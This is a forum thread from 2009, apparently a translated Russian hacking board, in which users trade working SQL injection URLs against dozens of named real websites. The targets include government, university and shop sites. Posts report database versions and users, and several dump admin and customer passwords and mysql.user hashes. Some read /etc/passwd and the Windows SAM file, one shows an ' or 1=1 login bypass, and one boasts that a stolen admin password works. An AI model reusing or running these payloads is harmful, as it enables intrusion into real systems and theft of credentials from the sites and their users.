http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass ,type,session),6,7+from+oil_users
outputs all rows at once

[x60]unu
09.11.2009, 20:01
99px.ru - world of avatars))) TC=20
http://99px.ru/avatar/?pid=13031/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13/*

version - 4.1.22
database - px99ru
user - px99ru@localhost
os - portbld-freebsd6.3

Bb0y
09.11.2009, 20:05
http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,column_name),3, 4+from+information_schema.columns+where+table_name =0x61646d696e
admin::id:fullname:username:,password:level:userem ail
MySQL 5.0.75
http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,usernam e,0x3a,password,0x3a,useremail,0x3a,level),3,4+fro m+admin

Gorev
09.11.2009, 21:32
http://www.rohouse.com/details.php?id=964+UNION+SELECT+1,2,3,4,5,6,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65+LIMIT+1,1--



Database Version: 5.0.77-log
Database name: rohouse_com
User name: pinatubo@localhost
Os: redhat-linux-gnu

[x60]unu
10.11.2009, 00:44
website development and design - TC=20

Blind SQL -
http://rireg.net/index.php?page=procjects&show=35/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)
version - 5.0.45

mr.The
10.11.2009, 03:07
Decided to recall how this is done..
_ttp://www.veriflora.com/findveri-client-list.php?id=-1+UNION+SELECT+1,2,concat%28table_name,CHAR%2845,6 1,45%29,column_name%29,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+fr om+information_schema.columns--
I have no idea how the passwords are encrypted there.

UPD, wow, it's half past one at night..

warlok
10.11.2009, 04:56
http://skytexalliance.com/index.php?id=15&p=1&tid=1+union+select+1,2,3,concat_ws(0x3a,version(), database(),user())

4.0.27-max-log:db171625947:dbo171625947@74.208.16.88

http://www.ac-psych.org/index.php?id=1+union+select+concat_ws(0x3a,version (),database(),user())

5.0.33-log:acpsych_ac-psych:acp_ac-psych@81.2.203.24

http://www.imperian.com/players.php?search=deathlog&day=1+and+(substring(version(),1,1))=4

version() - 4.1.20-log

Ctacok
10.11.2009, 09:07
http://mat.fobo.ru/show.php?show=-1234'+union+select+1,concat_ws(0x3a,user(),databas e(),version(),@@basedir)+--+
User:fobomat@localhost
Database:fobomat
Version: 5.0.51a-19-log
BaseDir: /usr/

LokbatanLi
10.11.2009, 11:13
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1'a

http://apps.facebook.com/observerfacebook/?p=challenges&id=-1+union+selec+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17

Version: 5.0.67-log

User: adminclt_13@209.68.2.10

Database: adminclt_testsite

OS: unknown-freebsd6.2


http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat(table_name),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17 +from+information_schema.tables


http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat%28column_name% 29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20+from+i nformation_schema.columns+where+table_name=0x41646 D696E5F55736572

Admin table: Admin_User

http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat%28id,0x3a,user id,0x3a,password,0x3a,name,0x3a,level%29,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17%20+from+Admin_User

nikp
10.11.2009, 12:10
5.0.81-community-log : jocurius_garrone@localhost
http://www.poze.name/poze.php?id_categ=-100+union+select+concat_ws(0x203a20,version(),user ())--

5.0.18 : root@localhost : localhost : root : Y
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,concat_ws(0x203a20,version(),us er(),host,user,password,file_priv),3,4,5,6,7,8,9+f rom+mysql.user--
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,load_file(0x2f6574632f706173737 764),3,4,5,6,7,8,9

Bb0y
10.11.2009, 13:01
http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,column_name),3, 4+from+information_schema.columns+where+table_name =0x427573546f7055736572
BusTopUser::ID:UserName:UserPass
http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,ID,0x3a,UserNam e,0x3a,UserPass),3,4+from+BusTopUser
MySQL 5.0.45
admin panel: http://www.let-online.co.uk/admin/login.php
error output is disabled

Dyxxx
10.11.2009, 14:10
Coldplay.com pr7
Official site of the pop/rock band coldplay.
http://www.coldplay.com/newsdetail.php?id=547'+union+select+null,null,null ,concat_ws(char(32,124,32),version(),user(),databa se(),@@version_compile_os),null,null,null,null,nul l+--+version | user | database | os
4.1.22-log | coldplay_user@vlonj205w1.emihosting.com | coldplay | redhat-linux-gnu

$n@ke
10.11.2009, 17:23
dudu edu
http://library.uncc.edu/knowledgebase/question.php?q=3+order+by+9/*&oquery=Borrow&dept=library
load_file ;-)

[x60]unu
10.11.2009, 17:31
http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ ws(0x3a,version()),0,0,0,0+from+idesk_user--
version - 5.0.51a-24+lenny2
database - web5@localhost
user - usr_web5_2
os - debian-linux-gnu

users
http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ ws(0x3a,user_name,password,last_login),0,0,0,0+fro m+idesk_user--

pelligrim
10.11.2009, 18:16
http://rassvet.websib.ru/portret_sec.htm?cod=1+and+substring(version(),1,1) =4

version: 4.1.20
database: cinema
user: shine@localhost


http://www.knyazev.ru/index.php?mm=7&id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4--

4.1.22-standard-log:balabol_knyazev:balabol_knyazev@web03.lan
There are tables admins, clients


http://www.tutpricol.ru/message.php?id=9999+union+select+1,2,concat_ws(0x3 a,version(),database(),user()),4,5,6,7--

4.1.25-log:tutpric5_tutpricol:tutpric5_root@localhost
there is a users table

maestra_toys
10.11.2009, 19:17
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,user() ,database(),version()),3,4,5,6
opendag@localhost:wwwopendagru:4.1.25-log


http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,us er(),database(),version()),5,6%20--
root@localhost:ovd:5.0.27

http://www.patrulrinpoche.ru/news.php?id=-72+union+select+concat_ws(0x3a,user(),database(),v ersion())
patrul_ru@localhost:patrul_ru:5.0.27-community-nt

http://www.caen.it/nuclear/news.php?id=-160+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9%20--
mynews@localhost:CaenNews:5.0.77

http://www.phenomental.ru/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4%20--
phenomenta@localhost:phenomenta_sql:4.1.22

[underwater]
10.11.2009, 20:27
http://www.erf-nimes.org/page_1.php?ID=-101+and+1=0+union+select+1,2,concat(nomutilisateur ,0x3a,motpasse),4+from+utilisateur--


http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(0x3a,userUserName,userP assword,userID),3,4,5,6,7,8,9,10+from+users--

http://www.exhaus.de/index.php?siteID=2499+union+select+1,2,concat_ws(0 x3a,user(),version(),database()),4,5,6,7,8--

http://www.eamesoffice.com/vintage/spotting_detail.php?id=-92+and+1=0+union+select+1,2,3,4,5,6,7,8,concat%28u sername,0x3a,userpasswo
rd%29,10,11,12,13+from+users--


http://www.tasfrance.com/view_newsletter.php?id=-12+and+1=0+union+select+1,2,3,4,5,6,concat(clinum, 0x3a,password),8+from+password--

[x60]unu
10.11.2009, 21:48
portacafe.ru

Blind SQL -
http://portacafe.ru/index.html?id=1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)j)k)l)/**/AND/**/1=1

version - 5.0.51a-24+lenny2-log

$n@ke
10.11.2009, 21:58
=))
revip:
star-force.ru
star-force.com

http://www.onlinesecurity-on.com/protect.phtml?c=55+union+select+1,2,3,database(),u ser(),6,7,8,9,10,11,12,version(),14,15,16,17+limit +1,1/*

onlinesecurity@localhost
onlinesecurity
5.0.45

DezMond™
10.11.2009, 22:03
http://www.shaman-magazine.com/fhs/template_e-magazine.php?ID=-125+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+&bereich=1

http://ashleybakery.com/features.php?ID=-1+union+select+1,2,3,4+--+

http://gorabazarici.org/news.php?id=-14+union+select+1,2,concat_ws(0x3a3a,admin_id,admi n_username,admin_password),4,5+from+admin_master+--+

http://photo-usa.ru/magazine.php?action=goodsdescription&target=-937+union+select+1,2,3,4,5,6,7,8,9,10+/*+

http://www.soulsista.nl/pages/magazine.php?onderwerp=diggindeep&id=-63+union+select+1,2,3,4,5,6,7,8,9+from+admin+/*+&lastlink=magazine

http://www.ilfaroonline.it/magazine.php?id=-487+union+select+1,2,pass,4,5,6+from+admin+--+

http://www.police.sec.ps/magazine.php?id=-1+union+select+1,password,user,4,5,6,7+from+_user+--+

http://zy.excite.co.jp/p/magazine.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17+/*+

2pick
10.11.2009, 22:24
http://www.rustavi2.com/news/calendar_newsg.php?pg=&ddd=-2.9.2009%27%20UNION%20SELECT%201,2,3,user%28%29,ve rsion%28%29,6,7,8,9,10,11,12,13,14,15,16,17%23&ddd2=2-9-2009&month=10&year=2009&wth=&ct=0&id_news=0

Looks like they're being DDoSed... Well, here's an SQL injection to add to the pile :)

hackmen
10.11.2009, 22:39
PR6
http://health.utah.gov/medicaid/pharmacy/priorauthorization/view.php?id=-1+union+select+1,2,3,4,5--

ver: 4.1.6-gamma-standard-log
base: pharmacy
user: pharmadmin@hlcblxweb1.hl
os: pc-linux

[underwater]
10.11.2009, 23:56
http://group.ge/show.php?id_series=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

http://www.dco.es/doxanews.php?id=-1+union+select+all+concat_ws(0x3a,version(),user() ,database()),2,3,4,5,6--

http://www.soundboards.com/comment.php?id=null%20union%20all%20select%201,2,3 ,concat(email,0x3a,password),5%20from%20users--

z00MAN
11.11.2009, 01:33
http://erem.ru/pages/products.html?id=-11+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,8,10,11,12,13--

eremeevskoe:4.0.16:eremeevskoe@localhost

TIC80
PR2


ololo shkolota

http://dag.com.ua/nikolaev/schools/index.php?show=article&new_id=1+union%20all+select+1,null,null,null,null, null,null,null+--+
TIC130

ILYAtirtir
11.11.2009, 03:54
Federal Space Agency. Research Center for Operational Earth Monitoring.

http://catalog.ntsomz.ru/data_new/dataset/ds_det.php?ds=RRR'+union+select+null,BANNER||user, null,null,null,null,null,null,null,null,null,null, null,null,null+from+v$version--
CORE 9.2.0.1.0 Production||OMZ

http://thema.ntsomz.ru/modis/cgi/modis_proj.pl?id=2404&type=modis'+union+select+1,2,3,4,5,6,7,8,9,10,11,c oncat_ws(0x3a,database(),user(),version()),13--+
granules_products:granules_reader@localhost:5.0.45-log

maestra_toys
11.11.2009, 12:34
TIC 20 PR 5
http://www.insanely-great.com/news.php?id=-10655+union+select+1,2,3,concat_ws(0x3a,user(),dat abase(),version()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18 --
flamini_flaminio@216.14.208.109:flamini_igm:4.1.21-log

PR 5
http://www.grfoundation.org/news.php?id=-62+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10
grcf@localhost:grcf:5.0.51a

s0l_ir0n
11.11.2009, 13:07
I don't even know what this is:
dekulk@localhost:dekulk:5.0.51a
http://www.dekulk.nl/doc.php?id=-1+union+select+1,2,3,ConCat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,5+--

SQL injection output via saving a php file :D
ws-univ@localhost:ws-univ:4.1.22
http://widener.webstudy.com/doc.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,ConCat_w s(0x3a,user(),database(),version()),14,15,16,17,18 ,19,20,21,22+--

University of Tanzania:
aru_web@localhost:aru_web:5.0.22
http://www.aru.ac.tz/doc.php?id=-1+union+select+ConCat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8,9,10,11+--

A site about osteochondrosis:
h2ssd-m_root@localhost:h2ssd-m_spinet:5.0.45-log
http://spinet.ru/voting/stat.php?id=-1+union+select+1,ConCat_ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3--

mailbrush
11.11.2009, 13:49
flamman.se
http://www.flamman.se/senaste.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user() ,database(),version()))),4,5,6,7,8
u4517781@webludde.ballou.se:u4517781_1:4.1.13-standard

basketme.com
http://www.basketme.com/2.0/opinion.php?id=-70+UnIoN+SeLeCt+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8
cm187240@81.88.49.32:cm187240:5.0.60sp1-enterprise-gpl-log

diariodelasislas.es
http://www.diariodelasislas.es/opinion.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4
diario@localhost:diario:4.1.20

pelligrim
11.11.2009, 14:58
http://www.severyanka.ru/news.php?id=12+union+select+1,2,3,version()--

4.1.22:stsbs_nsk_severyanka:stsbs-nsk_sever@212.193.229.149
there is a clients table

http://www.region-media.ru/city.php?id=99989+union+select+1,2,3,4,5,concat_ws (0x3a,version(),database(),user()),7--

5.0.22:wwwregionpressar_wwwregionmediar:region01_w wwregi@localhost

http://bfvz.ru/thanks.php?id=999999+union+select+1,concat_ws(0x3a ,version(),database(),user()),3--

5.0.45:bfvz_bfvz:bfvz@localhost

547
11.11.2009, 17:19
the site, as you have probably guessed, is in Finnish)
http://www.ymparistokasvatus.fi/vihrealippu/osallistujat/show.php?id=-110+union+select+1,unhex(hex(concat_ws(0x3a,Id,use rname,password))),3,4,5,6,7,8,9,10,11,12+from+admi ns--

the password works, so welcome to the admin panel) ;)

moving on!!!

http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,dat abase(),version(),user(),@@version_compile_os),26, 27,28,29,30--
zargon:4.1.12-standard:pc-linux-gnu-log:zargon@localhost

http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r_name,user_password),26,27,28,29,30+from+4images_ users--


http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r,passwd),26,27,28,29,30+from+users--
dirs



--------------------------------
--------------------------------

[x60]unu
11.11.2009, 17:22
history.uk.com -
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/version(),2/**/FROM/**/mysql.user/*
version - 5.0.20-log
user - root@localhost
database - history

mysql.user
user - root
password - C08D908F016260368DD6A842F1E03730F8FD0D20
filtering - p
file_priv - Y
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),user,password,'p',file_pr iv),2/**/FROM/**/mysql.user/*

etc/passwd

http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/load_file('/etc/passwd'),2/**/FROM/**/mysql.user/*

ILYAtirtir
11.11.2009, 19:32
Altai Republic :: official internet portal
TIC: 600
PR: 6

http://www.altai-republic.com/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=20000+union+select+1,2,concat_ws(0x3a,databa se(),user(),version()),4,5&page=1
altaire8_ra:altaire8_ra@localhost:4.1.25-log
We work for a thank-you!)

Xcontrol212
11.11.2009, 20:59
http://www.cyclosprint.eu/shop.php?cid=93&hmID=-1+union+select+1,concat_ws(%27;%27,login,password) ,3,4,5,6,7,8,9+from+users_admin+limit+1,1/*

http://www.cap-press.com/cart.php?add=-1+union+select+1,version()--
5.0.67-log
version 5
capsci_r@209.68.2.28
capsci_bookdb

Tables:


http://www.euroinf.it/shop/shop.php?id=-1 union select 1,2,3,Column_Name,5,6,7,8 from INFORMATION_SCHEMA.Columns where Table_Name=0x636c69656e746932/*

All the tables are visible here:
http://www.euroinf.it/shop/shop.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+INFOR MATION_SCHEMA.TABLES/*

Bb0y
11.11.2009, 21:55
Government)

MySQL 5.0.45-community-nt
the server runs on Windows
http://odpa14.gov.ua/?_npp=-3746+union+select+1,concat_ws(0x3a,user,0x3a,passw ord,0x3a,file_priv)+from+mysql.user

http://odpa14.gov.ua/?_npp=-3746+union+select+1,hex(load_file(0x633a2f77696e64 6f77732f7265706169722f73616d)) - reading files on the server. The sam file

onbka
11.11.2009, 23:36
http://housewives.org.ua/text.php?id=-689 union select 1,2,3,4,concat_ws(0x3a,version(),user(),databa se()) --
4.1.25-log:freemp3_slovo@193.200.173.5:freemp3_slovo

[aywo]
12.11.2009, 00:45
PR4
http://www.proconsim.ru/cat.php?m=-1+union+select+1,2,3,concat_ws(0x3a,user(),%20vers ion(),%20database()),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41/*

PR1
http://www.czech-tech.ru/index.php?dword=catalog&id=10+union+select+1,2,3,table_name+from+INFORMATI ON_SCHEMA.TABLES+LIMIT+1,1 --

PR3
http://www.baurum.ru/_library/?cat=pipes-plastic&id=-9999+union+select+1,2,concat_ws(0x3a,%20version(), %20user(),%20database()),4,5,6,7,8,9,10,11,12/*

Mr.Br0wn
12.11.2009, 01:49
http://www.slavgorod.ru/admin/editnews.php?id=3775{SQL}

login: ' or 1=1/*
password: ' or 1=1/*

http://www.slavgorod.ru/admin/

TIC: 230
PR: 3

ElteRUS
12.11.2009, 02:44
A sex shop, let's stock up ^^

http://www.extremerestraints.com/tell_a_friend.php?products_id=1248+union+select+*+ from+(select+*+from+(select+name_const((select+con cat_ws(0x2F,customers_email_address,customers_pass word)+from+customers+limit+0,1),14)d)+as+t+join+(s elect+name_const((select+concat_ws(0x2F,customers_ email_address,customers_password)+from+customers+l imit+0,1),14)e)b)a--+

hack-win32
12.11.2009, 17:01
infofir_seadmin@98.130.0.136:infofir_SE:5.0.41-community-log
http://www.senesco.com/newsitem.php?id=-168+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version())--


monkey0_nick@localhost:monkey0_jo151:4.0.27-standard
http://www.nivb.com/newsitem.php?item=-122+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4--


u10118317@lon1-webmysql-2.msh.demon.net:u10118317:4.0.30-log
http://www.jadeprint.com/newsitem.php?recordID=-12+union+select+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version()),7,8--


alvin@205.178.145.65:alvinsingleton:4.1.22-log
http://www.alvinsingleton.com/newsitem.php?id=-3+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4--


web108-craven@localhost:web108-craven:5.0.86-community
http://www.craven-property.com/newsItem.php?id=-51+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7--


blackroc_website@localhost:blackroc_general:5.0.77-community
http://blackrockspeedway.net/news/newsItem.php?tag=1&year=2009&item=-9+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version())--


alteuser@localhost:alte:4.0.22
http://www.alte.org/news/newsitem.php?newsID=-197+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5--


njwfadb@208.109.181.105:njwfadb:4.1.22-max-log
http://www.njworkingfamilies.org/newsItem.php?nwID=-34+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6--


fiddlefolk@localhost:fiddlefolk:5.1.35
http://www.fiddleworkshop.co.uk/newsitem.php?id=-84+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5--


churchdbuser@localhost:church:5.0.22-Debian_0ubuntu6.06.9-log
http://www.churchbuyinggroup.co.uk/newsitem.php?news_id=-7+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7--


danielkawczynski@localhost:danielkawczynski:5.0.51 a-3ubuntu5.4
http://www.daniel4shrewsbury.co.uk/newsitem.php?newsid=-15+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8--

$n@ke
12.11.2009, 21:15
output in the error message
http://survey.tpg.nl/php/main.phtml?c-Object=surv&c-Action=showform&c-Mode=test&ID=334+union+select+1,2,3,4,5,6,7,8,9,10,user(),12 ,13,14,15,16,17+limit+1,1/*
version()=4.0.21
user()=tpgsurveyuser3@localhost

KNR
12.11.2009, 22:02
http://ezonet.ru/teldir.php?catID=-36+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os)
4.0.27-max-log:ezonet77:ezonet77@v50.valuehost.ru:unknown-freebsd4.7

547
12.11.2009, 22:46
http://www.motorama.be/show.php?id=-117+union+select+1,2,concat_ws(database(),user(),v ersion(),@@version_compile_os),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--

root@localhostmotorama4.1.20-logmotoramaredhat-linux-gnu

http://www.motorama.be/show.php?id=-117+union+select+1,2,concat_ws(0x3a,user,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.us er--

LFI:
http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/etc/group'),4,5,6,7,8,9,10,11,12,13,14,15,16,17--

ILYAtirtir
13.11.2009, 00:48
Official website of the Ministry of Economy of the Republic of Buryatia
http://economy.buryatia.ru/index-n.htm?a=short&p=1&t=3333+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8--
economy_ru:newser@localhost:5.0.41-log

People's Assembly of the Republic of Ingushetia
http://www.parlamentri.ru/news.php?arcyear=2008+and+substring(version(),1,1) =3--+&arcmonth=12

Continuing for a thank-you)

Gaus
13.11.2009, 14:21
PR5
http://www.horwoodpublishing.net/order.php?id=-140+union+select+1,concat_ws(0x3a,username,pwd),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from +tbl_users--
version: 4.1.15-standard-log
database: horwoodpub
-----------------------------------------
PR5
http://www.iams.co.uk/cat/where-to-buy.php?id=-46+union+select+1,concat_ws(0x3a,version(),databas e()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25--
version: 5.0.37-community-log
database: iamsfr
-----------------------------------------
PR5
http://www.rtos.com/page/product.php?id=-2+union+select+1,2,version(),4--
version: 4.1.20-log
database: expresslogic

^YaHoo^
13.11.2009, 23:32
http://www.designtrend.hu/index.php?inc=rovat&RId=-1+Union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4--
5.1.38:dcmagazin:dcmagazin@localhost: portbld-freebsd7.2

http://miami21.metro1companies.com/details.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65--
4.1.22:metro1_1:gt3creative@localhost: portbld-freebsd4.10

http://www.meechannel.com/index.php?sec=organize&setid=-1+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)--
http://www.meechannel.com/index.php?sec=organize&setid=-1+union+select+concat_ws(0x3a,user,password)+from+ mysql.user+limit+16,21--
5.0.27:meechannel:meechannel@localhost:redhat-linux-gnu

http://www.gtk.fi/slr/article.php?id=-18+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11--
5.0.77:slr:slr@localhost:redhat-linux-gnu

http://www.ventasport.ru/tovar.php?id=1/**/union/**/select/**/1,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18/*
4.0.27-log:db12509m:m12509@fhe7.hoster.ru: portbld-freebsd7.0

http://www.shinamir.ru/index.php?pageId=-50+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10
http://www.shinamir.ru/index.php?pageId=-50+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6,7,8,9,10+from+mysql.user+limit+24,24
5.0.45-log:shinamir:shinamir@localhost:redhat-linux-gnu

Aртем
14.11.2009, 01:46
http://www.avk-bearing.ru/n.php?id=7+and+1=0+union+select+1,2,3,4,5--
http://www.gotranslators.ru/cv.php?dir=22&id=486+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35--
http://www.sdosug.ru/vote.php?ID=132+and+1=0+union+select+1,2,3,4--
http://girl.veneradosug.ru/vote.php?ID=92+and+1=0+union+select+1,2,3,4--
http://piter.dosug24.ru/vote.php?ID=705+and+1=0+union+select+1,2,3,4--

Roston
14.11.2009, 04:26
http://www.craft-russia.ru/rdvs/index.php?id=-41+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5+--+


Database Version: 5.0.67-log
Database name: u45240
User name: u45240@10.10.223.201

mol0t
14.11.2009, 14:38
http://www.estensa.it/web-agency-dett-news.php?id=-33+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10--
database: Sql161320_1
version: 5.0.82sp1-log
user: Sql161320@62.149.141.31

547
14.11.2009, 15:36
http://www.spes-forum.be/spes/page.php?LAN=N&FILE=agendadetail&ID=-942+union+select+1,user(),3,4,5,6,7,8,9,10,11,12--

log-standard-4.1.13

http://insidestory.mxv.be/page.php?id=-22+union+select+1,2,version(),4,5--

5.0.45-log

http://www.flandersmusic.be/page.php?ID=-65+union+select+version()--

5.1.36-0.dotdeb.0

mol0t
14.11.2009, 21:51
http://www.payperclickuniverse.com/search-engine-latest-news.php?v=more&id=-66+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6,7--
database:ppcu_ppc
version:4.1.22-log
user:ppcu@web2-int



http://www.iolabsinc.com/news.php?id=-66+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6--
database:iolabs
version:5.0.67-userstats-log
user:iolabs@waboba.com


http://www.thekarchergroup.mobi/mobile-news.php?id=-66+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
database:TheKarcherGroup
version:5.0.45-log
user:thekarchergroup@php5.thekarchergroup.com



http://www.jazzdimensions.de/news.php?ort=Berlin&id=-66+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
database:db16424844
version:4.0.27-max-log
user:dbo16424844@195.20.225.5



http://www.sportpark-quickborn.de/news.php?id=-66+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--

database:DB352449
version:5.0.67-log
user:U352449@hoon.store

edge911
15.11.2009, 00:45
MSsql
PR 5
http://www.kajaaninteatteri.fi/index.asp?pid=447%27+or+447=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+(%27www_menusettings%27,%27dtproperties%27 ,%27postituslista_asetukset%27,%27postituslista_as iakkaat%27,%27postituslista_lahetykset%27,%27posti tuslista_ryhmat%27,%27postituslista_sivupohjat%27, %27sysconstraints%27,%27syssegment%27,%27syssegmen ts%27,%27www_area%27,%27www_clientsettings%27,%27w ww_counter%27))%20--
http://www.sotkamo.fi/index.asp?pid=285%27+or+285=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+(%27auutiset_alueet%27,%27yritysrekisteri% 27,%27auutiset_uutiset%27,%27www_area%27))%20--

Gaus
15.11.2009, 01:44
PR4
http://www.natural-insect-control.com/product.php?id=000000283+and+1=0+union+select+1,co ncat_ws(0x3a,User,Password),3,4+from+mysql.user--
version: 5.0.77-log
user: root@localhost
database: naturalinsect
PR2
http://www.ldicolortoolbox.com/product.php?id=98&cid=30+and+1=0+union+select+1,concat_ws(0x3a,versi on(),database(),user()),3,4,5,6--
version: 4.1.20
user: dang@localhost
database: ldi

Gaus
15.11.2009, 12:29
PR6
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=20+and+1=0+union+select+1,concat _ws(0x3a,version(),user(),database()),3,4,5,6,7,8, 9,10,11,12--
4.1.21:mercury@localhost:mercurymarine
PR5
http://www.adventureplus-bg.com/story.php?id=21+and+1=0+union+select+concat_ws(0x3 a,version(),user(),database())--
4.0.26a:top@sg-acd12:top
PR5
http://channelstv.com/prog_transcript.php?id=34+and+1=0+union+select+1,2 ,concat_ws(0x3a,version(),user(),database()),4,5--
4.1.22-log:channels_user@67.205.111.186:channels
PR5
http://www.digital-everywhere.com/shop/index.php?page=artikel&pkateg=20+and+1=0+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5--
4.1.22-standard-log:db188898_1@local2:db188898_1
PR4
